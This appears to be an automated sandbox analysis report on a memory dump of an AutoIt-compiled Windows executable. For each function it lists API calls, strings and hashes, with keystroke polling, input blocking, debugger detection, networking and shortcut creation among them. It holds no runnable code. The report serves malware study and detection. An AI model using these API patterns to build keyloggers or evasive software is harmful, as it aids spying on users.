          • Instruction ID: 9e9572b9b49def36907e3621fb7bb43011bf8c1816f40e4d8020cf406d979aa1
          • Opcode Fuzzy Hash: 7837e7e2d2f52cc9b5b3487122530c26f2df06f5e82055a18722bfca4ffbffae
          • Instruction Fuzzy Hash: F0F0E5726983103AE82926953C01EF7339C9B21967F000061FD1CD1284EB52785546F5
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011A65D3, Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
          Download Yara Rule
          APIs
            • Part of subcall function 01194E62: inet_addr.WSOCK32(?), ref: 01194E86
          • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 011A6629
          • WSAGetLastError.WSOCK32(00000000), ref: 011A664C
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ErrorLastinet_addrsocket
          • String ID:
          • API String ID: 4170576061-0
          • Opcode ID: c06b85a47c201bed1f9b019c58c3d2eeccdde9798ef7431fb6b92a6d5fccf408
          • Instruction ID: 2b95ef0fd5fc12d0a144d8f66db42122b1a41c225f31f05315d99198a862d471
          • Opcode Fuzzy Hash: c06b85a47c201bed1f9b019c58c3d2eeccdde9798ef7431fb6b92a6d5fccf408
          • Instruction Fuzzy Hash: AC410532600301ABD724EF78DC85F5A77E4AF94728F148669F914EB3C1DBB1E8808794
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01186308, Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
          Download Yara Rule
          APIs
          • GetCursorPos.USER32(?), ref: 0118631D
          • ScreenToClient.USER32 ref: 0118633A
          • GetAsyncKeyState.USER32(?), ref: 01186377
          • GetAsyncKeyState.USER32(?), ref: 01186387
          • GetWindowLongW.USER32(?,000000F0), ref: 011863DD
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AsyncState$ClientCursorLongScreenWindow
          • String ID:
          • API String ID: 3539004672-0
          • Opcode ID: 3202d039839e496934b06e8249a93792c24c742d0a7ddcce3c5e75c7d735ac55
          • Instruction ID: 3f53063a2185259490935a4be59f6b465d3d9793f6111f8b9fd4643ed45e5442
          • Opcode Fuzzy Hash: 3202d039839e496934b06e8249a93792c24c742d0a7ddcce3c5e75c7d735ac55
          • Instruction Fuzzy Hash: 37412F75504215BFDB28EE68C888DEFBBB9EF45320F108659F96997284CB30A940DF60
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011AA2EA, Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
          Download Yara Rule
          APIs
            • Part of subcall function 0119F356: IsWindow.USER32(00000000), ref: 0119F386
          • IsWindowVisible.USER32 ref: 011AA322
          • IsWindowEnabled.USER32 ref: 011AA332
          • GetForegroundWindow.USER32(?,?,?,00000001), ref: 011AA33F
          • IsIconic.USER32 ref: 011AA34D
          • IsZoomed.USER32 ref: 011AA35B
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Window$EnabledForegroundIconicVisibleZoomed
          • String ID:
          • API String ID: 292994002-0
          • Opcode ID: fbd09565a5a60f25b1c1fb03cf002e031a03e4ba1e407236ee4af3ba77e875e6
          • Instruction ID: 06125ac8428ce9cb4267876f6e07557a3d9384af2c681ef58f1e88b774cad6a9
          • Opcode Fuzzy Hash: fbd09565a5a60f25b1c1fb03cf002e031a03e4ba1e407236ee4af3ba77e875e6
          • Instruction Fuzzy Hash: B611B1367042125BE729AF2AEC48B9BBFA8AF90321F548429E944D7240D7B4F841C7E0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0114A128, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
          Download Yara Rule
          APIs
          • IsDebuggerPresent.KERNEL32 ref: 01151EE1
          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01151EF6
          • UnhandledExceptionFilter.KERNEL32(011B43DC), ref: 01151F01
          • GetCurrentProcess.KERNEL32(C0000409), ref: 01151F1D
          • TerminateProcess.KERNEL32(00000000), ref: 01151F24
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
          • String ID:
          • API String ID: 2579439406-0
          • Opcode ID: 0d6e7477e4f2e87c7e7c2ca68ddb7fafe20479b303982dc56dc3605b7c870501
          • Instruction ID: 56ca2cbf6890d734d0f2bbaacc516e29ad64ea5f1d9ebffd8bf59bc10796c950
          • Opcode Fuzzy Hash: 0d6e7477e4f2e87c7e7c2ca68ddb7fafe20479b303982dc56dc3605b7c870501
          • Instruction Fuzzy Hash: E421CBB9805205DFD7A9DF69F984648BFA6FB48300F40016AF9298B398E7F169C5CF01
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0119E0F6, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
          Download Yara Rule
          APIs
            • Part of subcall function 01172654: _wcslen.LIBCMT ref: 01172680
          • CoInitialize.OLE32(00000000), ref: 0119E16E
          • CoCreateInstance.OLE32(011B2A08,00000000,00000001,011B28A8,?), ref: 0119E187
          • CoUninitialize.OLE32 ref: 0119E1A6
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: CreateInitializeInstanceUninitialize_wcslen
          • String ID: .lnk
          • API String ID: 886957087-24824748
          • Opcode ID: ade606809ee0baa431b56c19ee403b18f13f9f635d1f3fa8a27fdd86ae33bc79
          • Instruction ID: fa2a4db4513b90cfbd92c9d2e6bafb746ddab870ebfec4a49f405a4624729c14
          • Opcode Fuzzy Hash: ade606809ee0baa431b56c19ee403b18f13f9f635d1f3fa8a27fdd86ae33bc79
          • Instruction Fuzzy Hash: 38A15BB5A182029FC708EF68C880A5BB7E5BF88714F14895CF9959B355C731EC45CBA2
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0117F3A6, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _memmove
          • String ID: U$\
          • API String ID: 4104443479-100911408
          • Opcode ID: ae7a4ba22816af1282f93fde426510ec886842ecc271ba72dd985595deeca22d
          • Instruction ID: 89aea55e3f9376174d4423ccfe46f854c731d9252ce966ed1be73025cdf672b6
          • Opcode Fuzzy Hash: ae7a4ba22816af1282f93fde426510ec886842ecc271ba72dd985595deeca22d
          • Instruction Fuzzy Hash: FA028070E0424A9FDB2DCF69C4907BEBBF2AF85314F24819DD962A7381D7345A82CB51
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01172361, Relevance: 1.6, APIs: 1, Instructions: 111filenetworkCOMMON
          Download Yara Rule
          APIs
            • Part of subcall function 011448E2: __wfsopen.LIBCMT ref: 011448EF
          • InternetReadFile.WININET(?,?,00000400,00000001), ref: 011723D5
            • Part of subcall function 01172252: GetLastError.KERNEL32 ref: 01172268
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ErrorFileInternetLastRead__wfsopen
          • String ID:
          • API String ID: 127098866-0
          • Opcode ID: d44a8be647e0eebe793a07d579f8b76f9b236a0e2faf3ca2b26cf8d75250dca4
          • Instruction ID: 7295557d929fc87e2b6fb87d01929f75a9cd668f3e151a2ace0e4e052fe011ed
          • Opcode Fuzzy Hash: d44a8be647e0eebe793a07d579f8b76f9b236a0e2faf3ca2b26cf8d75250dca4
          • Instruction Fuzzy Hash: 69316B72A412053BD714EE49DC80FDAB7BCABA5714F008156FA44E7240D771A58B87B4
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0118A35D, Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
          Download Yara Rule
          APIs
          • BlockInput.USER32(00000001), ref: 0118A378
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: BlockInput
          • String ID:
          • API String ID: 3456056419-0
          • Opcode ID: 571afe1f0f46cc7bf13db54f2fd9cdb376366f4442843d8527f37a1a42fd084c
          • Instruction ID: daf78833ce0cf4d3f89bbb82fef9159e892a0a0f61db7eb783ba5a20fcc0c228
          • Opcode Fuzzy Hash: 571afe1f0f46cc7bf13db54f2fd9cdb376366f4442843d8527f37a1a42fd084c
          • Instruction Fuzzy Hash: F2E04F352043059BD718AF69D848A66BBE8EFA4764F00C42AED45D7340DBB0E840CBA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011894D6, Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
          Download Yara Rule
          APIs
          • DeleteObject.GDI32(?), ref: 01189528
          • DeleteObject.GDI32(?), ref: 0118953E
          • DestroyWindow.USER32(?), ref: 01189550
          • GetDesktopWindow.USER32 ref: 0118956E
          • GetWindowRect.USER32 ref: 01189575
          • SetRect.USER32 ref: 0118968B
          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 01189699
          • CreateWindowExW.USER32 ref: 011896D5
          • GetClientRect.USER32 ref: 011896E5
          • CreateWindowExW.USER32 ref: 01189728
          • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0118974D
          • GetFileSize.KERNEL32(00000000,00000000), ref: 01189768
          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 01189773
          • GlobalLock.KERNEL32 ref: 0118977C
          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0118978B
          • GlobalUnlock.KERNEL32(00000000), ref: 01189792
          • CloseHandle.KERNEL32(00000000), ref: 01189799
          • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 011897A6
          • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,011B29F8,00000000), ref: 011897BD
          • GlobalFree.KERNEL32 ref: 011897CF
          • CopyImage.USER32 ref: 011897FB
          • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 0118981E
          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 01189844
          • ShowWindow.USER32(?,00000004), ref: 01189852
          • CreateWindowExW.USER32 ref: 0118989C
          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 011898B0
          • GetStockObject.GDI32(00000011), ref: 011898BA
          • SelectObject.GDI32(00000000,00000000), ref: 011898C2
          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 011898D2
          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 011898DB
          • DeleteDC.GDI32(00000000), ref: 011898E5
          • _wcslen.LIBCMT ref: 01189903
          • _wcscpy.LIBCMT ref: 01189927
          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 011899C8
          • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 011899DC
          • GetDC.USER32(00000000), ref: 011899E9
          • SelectObject.GDI32(00000000,?), ref: 011899F9
          • SelectObject.GDI32(00000000,00000007), ref: 01189A24
          • ReleaseDC.USER32 ref: 01189A2F
          • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 01189A4C
          • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 01189A5A
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
          • String ID: $AutoIt v3$DISPLAY$static
          • API String ID: 4040870279-2373415609
          • Opcode ID: 0a1ed55c74dc988e3c5939af1749218ec1e60443f902220c3a128b318084aff8
          • Instruction ID: 7f8e4e186af271ddcd4f2b1ae1263687add35eb0a89eb740684047239e24f1af
          • Opcode Fuzzy Hash: 0a1ed55c74dc988e3c5939af1749218ec1e60443f902220c3a128b318084aff8
          • Instruction Fuzzy Hash: 89027275A00205AFDB28DF64CC89FAE7B79FB88714F148558FA15AB284C770E944CF60
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011890AA, Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
          Download Yara Rule
          APIs
          • DestroyWindow.USER32(?), ref: 011890DF
          • SystemParametersInfoW.USER32 ref: 0118919C
          • SetRect.USER32 ref: 011891DC
          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 011891ED
          • CreateWindowExW.USER32 ref: 0118922F
          • GetClientRect.USER32 ref: 0118923B
          • CreateWindowExW.USER32 ref: 0118927D
          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0118928F
          • GetStockObject.GDI32(00000011), ref: 01189299
          • SelectObject.GDI32(00000000,00000000), ref: 011892A1
          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 011892B1
          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 011892BA
          • DeleteDC.GDI32(00000000), ref: 011892C3
          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 01189309
          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01189321
          • CreateWindowExW.USER32 ref: 0118935B
          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0118936F
          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01189380
          • CreateWindowExW.USER32 ref: 011893B5
          • GetStockObject.GDI32(00000011), ref: 011893C0
          • SendMessageW.USER32(?,00000030,00000000), ref: 011893D0
          • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 011893DB
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
          • API String ID: 2910397461-517079104
          • Opcode ID: df60b1d69451946cb21d0a4e882140898d76a6881526eeaffbc68ec3794b5e3c
          • Instruction ID: e034eec23c4395a220ff789303f1f0e169ca027bc001bc7df9b7a5c089948d02
          • Opcode Fuzzy Hash: df60b1d69451946cb21d0a4e882140898d76a6881526eeaffbc68ec3794b5e3c
          • Instruction Fuzzy Hash: DCA1A575B40204BFE728DFA4DC8AFAE7B65AB84711F148518FB15AB2C4D7B0B940CB64
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01186529, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
          Download Yara Rule
          APIs
          • GetCursorPos.USER32(?,?), ref: 01186625
          • GetDesktopWindow.USER32 ref: 0118663A
          • GetWindowRect.USER32 ref: 01186641
          • GetWindowLongW.USER32(?,000000F0), ref: 01186699
          • GetWindowLongW.USER32(?,000000F0), ref: 011866AC
          • DestroyWindow.USER32(?), ref: 011866BD
          • CreateWindowExW.USER32 ref: 0118670B
          • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 01186729
          • SendMessageW.USER32(?,00000418,00000000,?), ref: 0118673D
          • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 0118674D
          • SendMessageW.USER32(?,00000421,?,?), ref: 0118676D
          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 01186783
          • IsWindowVisible.USER32 ref: 011867A3
          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 011867BF
          • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 011867D3
          • GetWindowRect.USER32 ref: 011867EA
          • MonitorFromPoint.USER32(?,00000001,00000002), ref: 01186808
          • GetMonitorInfoW.USER32 ref: 01186820
          • CopyRect.USER32 ref: 01186835
          • SendMessageW.USER32(?,00000412,00000000), ref: 0118688B
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
          • String ID: ($,$tooltips_class32
          • API String ID: 225202481-3320066284
          • Opcode ID: 3a03ae2c40d4dcb1c741132496b1c87e80d27c8df3c098af97cd7d34917a182c
          • Instruction ID: 9dad0b53f2bd17e4e5245bac44e48361d90c4e8648726daf8b4b78c252a75742
          • Opcode Fuzzy Hash: 3a03ae2c40d4dcb1c741132496b1c87e80d27c8df3c098af97cd7d34917a182c
          • Instruction Fuzzy Hash: 9AB174B0A00349AFDB18DFA8C884FAEBBB5FF48304F14C559E919AB245DB74A945CF50
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01198322, Relevance: 31.6, APIs: 6, Strings: 12, Instructions: 116COMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: __wcsicoll$__wcsnicmp
          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
          • API String ID: 790654849-1810252412
          • Opcode ID: 145e4af51f573737974ba08757b8950d2bbd220526dfb190300d635609627231
          • Instruction ID: 027a6886b748f6159143deeef1dcafaa569556fb548e0cc013fad6530d9c9977
          • Opcode Fuzzy Hash: 145e4af51f573737974ba08757b8950d2bbd220526dfb190300d635609627231
          • Instruction Fuzzy Hash: 6631B271A0820AA7DF1CFBA5DD81FDE73BCAF25619F500125ED50B7184EB20AE04C6B2
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011641CD, Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: __wcsicoll$IconLoad
          • String ID: blank$info$question$stop$warning
          • API String ID: 2485277191-404129466
          • Opcode ID: f428ef39747ce3eb71cbf834977588f10767992fe2c91f45358aad9c09066f5c
          • Instruction ID: 6aa1ad8f18a9c0c9a29d64eb96974f4ea162725a16764b64114861a1ccc8a9cf
          • Opcode Fuzzy Hash: f428ef39747ce3eb71cbf834977588f10767992fe2c91f45358aad9c09066f5c
          • Instruction Fuzzy Hash: A121F833B4420667DB15AA6ABC45FEB339CDFA4762F040036FD04E2546E362B564C2F9
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011845AE, Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
          Download Yara Rule
          APIs
          • LoadIconW.USER32 ref: 011845C1
          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 011845D3
          • SetWindowTextW.USER32(?,?), ref: 011845ED
          • GetDlgItem.USER32 ref: 01184605
          • SetWindowTextW.USER32(00000000,?), ref: 0118460C
          • GetDlgItem.USER32 ref: 0118461D
          • SetWindowTextW.USER32(00000000,?), ref: 01184624
          • SendDlgItemMessageW.USER32 ref: 01184646
          • SendDlgItemMessageW.USER32 ref: 01184660
          • GetWindowRect.USER32 ref: 0118466A
          • SetWindowTextW.USER32(?,?), ref: 011846DA
          • GetDesktopWindow.USER32 ref: 011846E4
          • GetWindowRect.USER32 ref: 011846EB
          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 01184739
          • GetClientRect.USER32 ref: 01184747
          • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 01184771
          • SetTimer.USER32 ref: 011847B4
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
          • String ID:
          • API String ID: 3869813825-0
          • Opcode ID: d8aa0e9e4b9925c028eba9ecc29155429d2b8f3215acd9916ae29ee64d0e0bc2
          • Instruction ID: b719cc1bbd09bee2c72ceb8de38a29351ee19c040f35b03a4dfd4f07ae8c6113
          • Opcode Fuzzy Hash: d8aa0e9e4b9925c028eba9ecc29155429d2b8f3215acd9916ae29ee64d0e0bc2
          • Instruction Fuzzy Hash: 21614F71A00705ABDB28EFA8C989FABB7F9AF44704F104918F64697684DB74F944CB50
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011945E0, Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
          Download Yara Rule
          APIs
          • _wcslen.LIBCMT ref: 01194765
          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 01194775
          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0119479D
          • _wcslen.LIBCMT ref: 01194865
